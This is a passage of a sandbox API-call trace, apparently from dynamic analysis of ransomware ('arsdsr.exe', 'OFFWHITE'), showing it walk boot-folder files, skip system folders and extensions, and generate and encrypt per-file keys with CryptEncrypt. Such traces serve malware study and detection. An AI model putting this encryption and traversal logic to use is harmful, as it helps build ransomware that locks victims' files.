GetProcessHeap () returned 0x500000 [0082.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bcc0 [0082.311] CreateFileW (lpFileName="C:/Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.311] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.311] GetProcessHeap () returned 0x500000 [0082.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5484a8 [0082.311] GetProcessHeap () returned 0x500000 [0082.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5484c0 [0082.311] GetProcessHeap () returned 0x500000 [0082.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521170 [0082.311] GetProcessHeap () returned 0x500000 [0082.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521278 [0082.312] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.312] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.312] SystemFunction036 (in: RandomBuffer=0x5484a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5484a8) returned 1 [0082.312] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.312] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.312] SystemFunction036 (in: RandomBuffer=0x5484c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5484c0) returned 1 [0082.312] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.312] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.312] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521170*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x521170*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.312] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.312] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.312] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521278*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x521278*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.312] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.312] SetLastError (dwErrCode=0x0) [0082.312] WriteFile (in: hFile=0xffffffff, lpBuffer=0x521170, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.313] GetLastError () returned 0x6 [0082.313] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.313] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.313] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0082.313] lstrcmpiW (lpString1="pt-PT", lpString2=".") returned 1 [0082.313] lstrcmpiW (lpString1="pt-PT", lpString2="..") returned 1 [0082.313] lstrcmpiW (lpString1="pt-PT", lpString2="...") returned 1 [0082.313] lstrcmpiW (lpString1="pt-PT", lpString2="windows") returned -1 [0082.314] lstrcmpiW (lpString1="pt-PT", lpString2="$recycle.bin") returned 1 [0082.314] lstrcmpiW (lpString1="pt-PT", lpString2="rsa") returned -1 [0082.314] lstrcmpiW (lpString1="pt-PT", lpString2="ntuser.dat") returned 1 [0082.314] lstrcmpiW (lpString1="pt-PT", lpString2="programdata") returned 1 [0082.314] lstrcmpiW (lpString1="pt-PT", lpString2="appdata") returned 1 [0082.314] lstrcmpiW (lpString1="pt-PT", lpString2="program files") returned 1 [0082.314] lstrcmpiW (lpString1="pt-PT", lpString2="program files (x86)") returned 1 [0082.314] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.314] lstrcatW (in: lpString1="C:/Boot\\", lpString2="pt-PT" | out: lpString1="C:/Boot\\pt-PT") returned="C:/Boot\\pt-PT" [0082.314] lstrcatW (in: lpString1="C:/Boot\\pt-PT", lpString2="\\" | out: lpString1="C:/Boot\\pt-PT\\") returned="C:/Boot\\pt-PT\\" [0082.314] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\pt-PT\\" | out: lpString1="C:/Boot\\pt-PT\\") returned="C:/Boot\\pt-PT\\" [0082.314] lstrcatW (in: lpString1="C:/Boot\\pt-PT\\", lpString2="*.*" | out: lpString1="C:/Boot\\pt-PT\\*.*") returned="C:/Boot\\pt-PT\\*.*" [0082.314] FindFirstFileW (in: lpFileName="C:/Boot\\pt-PT\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.315] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.315] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.315] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.315] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.315] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.315] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\pt-PT\\" | out: lpString1="C:/Boot\\pt-PT\\") returned="C:/Boot\\pt-PT\\" [0082.315] lstrcatW (in: lpString1="C:/Boot\\pt-PT\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\pt-PT\\bootmgr.exe.mui") returned="C:/Boot\\pt-PT\\bootmgr.exe.mui" [0082.315] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.315] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.315] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.316] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.316] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.316] GetProcessHeap () returned 0x500000 [0082.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bcf0 [0082.316] CreateFileW (lpFileName="C:/Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.317] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.317] GetProcessHeap () returned 0x500000 [0082.317] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5484d8 [0082.317] GetProcessHeap () returned 0x500000 [0082.317] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548550 [0082.317] GetProcessHeap () returned 0x500000 [0082.317] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521380 [0082.317] GetProcessHeap () returned 0x500000 [0082.317] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521488 [0082.318] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.318] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.318] SystemFunction036 (in: RandomBuffer=0x5484d8, RandomBufferLength=0x10 | out: RandomBuffer=0x5484d8) returned 1 [0082.318] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.318] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.318] SystemFunction036 (in: RandomBuffer=0x548550, RandomBufferLength=0x10 | out: RandomBuffer=0x548550) returned 1 [0082.318] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.318] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.318] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521380*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x521380*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.318] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.318] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.318] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521488*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x521488*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.318] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.318] SetLastError (dwErrCode=0x0) [0082.319] WriteFile (in: hFile=0xffffffff, lpBuffer=0x521380, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.319] GetLastError () returned 0x6 [0082.319] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.319] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.319] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2=".") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="..") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="...") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="windows") returned -1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="$recycle.bin") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="rsa") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="ntuser.dat") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="programdata") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="appdata") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="program files") returned 1 [0082.319] lstrcmpiW (lpString1="ru-RU", lpString2="program files (x86)") returned 1 [0082.319] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.319] lstrcatW (in: lpString1="C:/Boot\\", lpString2="ru-RU" | out: lpString1="C:/Boot\\ru-RU") returned="C:/Boot\\ru-RU" [0082.319] lstrcatW (in: lpString1="C:/Boot\\ru-RU", lpString2="\\" | out: lpString1="C:/Boot\\ru-RU\\") returned="C:/Boot\\ru-RU\\" [0082.319] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\ru-RU\\" | out: lpString1="C:/Boot\\ru-RU\\") returned="C:/Boot\\ru-RU\\" [0082.319] lstrcatW (in: lpString1="C:/Boot\\ru-RU\\", lpString2="*.*" | out: lpString1="C:/Boot\\ru-RU\\*.*") returned="C:/Boot\\ru-RU\\*.*" [0082.320] FindFirstFileW (in: lpFileName="C:/Boot\\ru-RU\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.320] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.320] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.320] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.320] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.320] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.320] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.321] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.321] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\ru-RU\\" | out: lpString1="C:/Boot\\ru-RU\\") returned="C:/Boot\\ru-RU\\" [0082.321] lstrcatW (in: lpString1="C:/Boot\\ru-RU\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\ru-RU\\bootmgr.exe.mui") returned="C:/Boot\\ru-RU\\bootmgr.exe.mui" [0082.321] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.321] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.321] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.321] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.321] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.321] GetProcessHeap () returned 0x500000 [0082.321] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bce0 [0082.321] CreateFileW (lpFileName="C:/Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.322] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.322] GetProcessHeap () returned 0x500000 [0082.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548568 [0082.322] GetProcessHeap () returned 0x500000 [0082.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5485e0 [0082.322] GetProcessHeap () returned 0x500000 [0082.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521590 [0082.322] GetProcessHeap () returned 0x500000 [0082.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521698 [0082.322] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.322] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.322] SystemFunction036 (in: RandomBuffer=0x548568, RandomBufferLength=0x10 | out: RandomBuffer=0x548568) returned 1 [0082.322] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.322] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.322] SystemFunction036 (in: RandomBuffer=0x5485e0, RandomBufferLength=0x10 | out: RandomBuffer=0x5485e0) returned 1 [0082.322] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.322] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.322] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521590*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x521590*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.323] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.323] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.323] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521698*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x521698*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.323] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.323] SetLastError (dwErrCode=0x0) [0082.323] WriteFile (in: hFile=0xffffffff, lpBuffer=0x521590, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.323] GetLastError () returned 0x6 [0082.323] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.323] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.323] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2=".") returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="..") returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="...") returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="windows") returned -1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="$recycle.bin") returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="rsa") returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="ntuser.dat") returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="programdata") returned 1 [0082.323] lstrcmpiW (lpString1="sv-SE", lpString2="appdata") returned 1 [0082.324] lstrcmpiW (lpString1="sv-SE", lpString2="program files") returned 1 [0082.324] lstrcmpiW (lpString1="sv-SE", lpString2="program files (x86)") returned 1 [0082.324] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.324] lstrcatW (in: lpString1="C:/Boot\\", lpString2="sv-SE" | out: lpString1="C:/Boot\\sv-SE") returned="C:/Boot\\sv-SE" [0082.324] lstrcatW (in: lpString1="C:/Boot\\sv-SE", lpString2="\\" | out: lpString1="C:/Boot\\sv-SE\\") returned="C:/Boot\\sv-SE\\" [0082.324] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\sv-SE\\" | out: lpString1="C:/Boot\\sv-SE\\") returned="C:/Boot\\sv-SE\\" [0082.324] lstrcatW (in: lpString1="C:/Boot\\sv-SE\\", lpString2="*.*" | out: lpString1="C:/Boot\\sv-SE\\*.*") returned="C:/Boot\\sv-SE\\*.*" [0082.324] FindFirstFileW (in: lpFileName="C:/Boot\\sv-SE\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, 